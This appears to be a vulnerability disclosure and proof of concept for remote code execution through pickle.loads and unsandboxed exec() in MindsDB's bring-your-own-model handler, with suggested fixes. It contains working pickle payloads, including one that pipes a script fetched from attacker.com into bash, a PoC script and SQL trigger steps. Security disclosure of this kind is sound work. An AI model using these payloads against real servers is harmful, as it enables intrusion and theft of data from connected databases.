PoC: MindsDB BYOM Handler — pickle.loads + exec() RCE
## README.md
# MindsDB: RCE via `pickle.loads()` in BYOM (Bring Your Own Model) Handler

## Vulnerability Type

CWE-502: Deserialization of Untrusted Data

## Severity

Critical: any user who can create a BYOM model achieves remote code execution on the MindsDB server.

## Affected Code

**File:** `mindsdb/integrations/handlers/byom_handler/byom_handler.py`

Three functions deserialize user-controlled model state:

```python
# Line 398: predict()
def predict(self, df, model_state, args):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state

# Line 407: finetune()
def finetune(self, df, model_state, args):
    self.model_instance.__dict__ = pickle.loads(model_state)  # ← RCE

# Line 419: describe()
def describe(self, model_state, attribute=None):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state
```
**Also affected:**

`mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55`:

```python
model_state = pickle.loads(model_state)  # subprocess wrapper
```

`mindsdb/interfaces/query_context/context_controller.py:275`:

```python
steps_data = pickle.loads(data)  # from cache
```

`mindsdb/integrations/libs/process_cache.py:45`:

```python
# IPC via pickle: exception propagation
```
## Attack Chain

1. **Attacker creates a BYOM model** via MindsDB SQL:

   ```sql
   CREATE MODEL pwned
   PREDICT target
   USING engine='byom',
         code='class Model: pass';
   ```

2. **The model's `train()` returns `pickle.dumps(self.__dict__)`.** An attacker who controls the model code therefore controls the pickled state, e.g. by placing an object with a malicious `__reduce__` into `__dict__`.

3. **When `predict()` is called** (e.g. `SELECT * FROM pwned WHERE ...`), the server deserializes the stored state with `pickle.loads(model_state)` → arbitrary code execution.
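Step 2 of the chain can be sketched concretely. The class below is hypothetical attacker model code, assuming the BYOM contract in which `train()` returns the pickled model state; the `__reduce__` payload calls the harmless `os.getcwd` instead of `os.system` so that load-time execution is observable without side effects.

```python
import os
import pickle


class RunsOnUnpickle:
    """pickle.loads() invokes whatever callable __reduce__ names.

    A real payload would be (os.system, ('<shell command>',));
    os.getcwd is a harmless stand-in.
    """

    def __reduce__(self):
        return (os.getcwd, ())


class Model:
    """Hypothetical attacker-supplied BYOM model."""

    def train(self, df, target_col, args=None):
        # The handler persists this return value and later feeds it to
        # pickle.loads() inside predict()/finetune()/describe().
        self.payload = RunsOnUnpickle()
        return pickle.dumps(self.__dict__)


state = Model().train(df=None, target_col='target')
restored = pickle.loads(state)  # the payload executes here, at load time
print(restored['payload'] == os.getcwd())  # True: os.getcwd ran during loads
```

Any state with this shape turns the server-side `pickle.loads(model_state)` call into a function call of the attacker's choosing.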
### Alternative: Direct state injection

If the attacker has access to the MindsDB storage backend (database), they can directly replace the stored model state bytes with a malicious pickle:

```python
import os
import pickle

class Exploit:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

malicious_state = pickle.dumps(Exploit())
# Insert into model storage → next predict() = RCE
```
## AI Impact (10x Multiplier)

MindsDB is an AI-in-database platform, and the BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:

- **Model poisoning**: replace a legitimate model with a backdoored version
- **Training data exfiltration**: RCE exposes all data MindsDB has access to
- **Database compromise**: MindsDB connects to user databases (MySQL, PostgreSQL, etc.), so RCE reaches every connected data source
- **Supply chain**: a poisoned model persists across restarts and affects all queries

## Known CVE Context

MindsDB has prior deserialization CVEs (CVE-2024-45846 and CVE-2024-45847, eval injection via the Weaviate integration). This BYOM `pickle.loads()` is a different, previously unreported vector.
## Suggested Fix

Replace `pickle.loads` with a safe alternative:

```python
import io
import json

def predict(self, df, model_state, args):
    # Use JSON-based deserialization instead of pickle
    model_state = json.loads(model_state)
    # Or use a restricted unpickler:
    # model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
    self.model_instance.__dict__ = model_state
```
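The restricted unpickler mentioned in the comment can be sketched with the stdlib pattern of overriding `pickle.Unpickler.find_class`. The allowlist below is illustrative (an assumption); a real fix would enumerate exactly the types a legitimate model state may contain.

```python
import io
import os
import pickle

# Illustrative allowlist (assumption): only plain containers and scalars.
ALLOWED_GLOBALS = {
    ('builtins', 'dict'),
    ('builtins', 'list'),
    ('builtins', 'set'),
    ('builtins', 'str'),
    ('builtins', 'int'),
    ('builtins', 'float'),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream references; refusing
        # unknown globals blocks payloads such as (os.system, (...,)).
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(
                f'forbidden global in pickle stream: {module}.{name}')
        return super().find_class(module, name)


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Evil:
    def __reduce__(self):
        return (os.system, ('echo pwned',))


# Plain state round-trips; the __reduce__ payload is rejected.
print(safe_loads(pickle.dumps({'weights': [1.0, 2.0]})))
try:
    safe_loads(pickle.dumps(Evil()))
except pickle.UnpicklingError as exc:
    print(f'blocked: {exc}')
```

Note that `json.loads` only works once the model state is reduced to JSON-serializable types; the restricted unpickler keeps the existing binary format while refusing every global not on the allowlist.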
## Invariant Violated

S16 (DeserializationGuard): the application MUST NOT call `pickle.loads` on data from user-controlled or shared storage.
## Additional Finding: Direct `exec()` on User Model Code

**File:** `mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80`

```python
def import_string(code, module_name='model'):
    module = types.ModuleType(module_name)
    exec(code, module.__dict__)  # ← direct code execution, NO sandbox
    return module
```

This is the execution path for BYOM models. When a user creates a model with `engine='byom'`, their Python code is passed to `import_string()`, which calls `exec()` with no sandboxing, no AST filtering, and no import restrictions.
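The effect of the quoted `import_string()` can be reproduced standalone. This sketch copies its logic rather than importing MindsDB, and the `user_code` string is a stand-in for attacker-supplied model code; the point is that top-level statements run immediately, before any class is instantiated.

```python
import types


def import_string(code, module_name='model'):
    # Same logic as the quoted handler function: user-supplied source is
    # executed as the new module's body, with no restrictions of any kind.
    module = types.ModuleType(module_name)
    exec(code, module.__dict__)
    return module


# Stand-in for attacker-controlled BYOM model code. Any top-level
# statement runs at load time; os.system would work just as well.
user_code = """
SIDE_EFFECT = 'top-level code ran during import_string()'

class Model:
    pass
"""

mod = import_string(user_code)
print(mod.SIDE_EFFECT)       # set by the "import", not by any method call
print(mod.Model.__name__)    # the declared class is also available
```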
The same file also uses `pickle.loads()` for IPC (stdin/stdout between parent and worker processes):

```python
def decode(encoded):
    return pickle.loads(encoded)  # line 55

def get_input():
    with open(0, 'rb') as fd:
        encoded = fd.read()
    obj = decode(encoded)  # pickle.loads on stdin
```

### Combined Chain

1. A user creates a BYOM model with malicious code → `exec(code)` → RCE
2. Even if `exec()` were sandboxed, the pickle IPC channel is unprotected → `pickle.loads` bypass

This is a **defense-in-depth failure**: two independent RCE vectors in the same module.
## poc.py
```python
"""MindsDB BYOM Handler: pickle.loads RCE PoC.

The BYOM (Bring Your Own Model) handler deserializes user-uploaded
model state via pickle.loads() without any safety checks.

Affected: mindsdb/integrations/handlers/byom_handler/byom_handler.py:398
Also: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80 (exec on user code)
"""
import os
import pickle


class MaliciousModel:
    """When this object is unpickled, it executes arbitrary code."""

    def __reduce__(self):
        return (os.system, ('id > /tmp/pwned',))


# This mirrors what happens when a user creates a BYOM model: the model
# state is pickle.dumps'd during train() and pickle.loads'd during predict().
malicious_state = pickle.dumps(MaliciousModel())

print(f"Malicious pickle payload: {len(malicious_state)} bytes")
print("When MindsDB calls predict() on this model, pickle.loads(model_state) triggers RCE")
print()
print("Attack chain:")
print("1. CREATE MODEL pwned USING engine='byom', code='<malicious model code>'")
print("2. SELECT * FROM pwned WHERE input='test'  -- triggers predict()")
print("3. predict() calls pickle.loads(model_state) -> RCE")
print()
print("Additionally, proc_wrapper.py:80 calls exec(code) on the model code directly")
```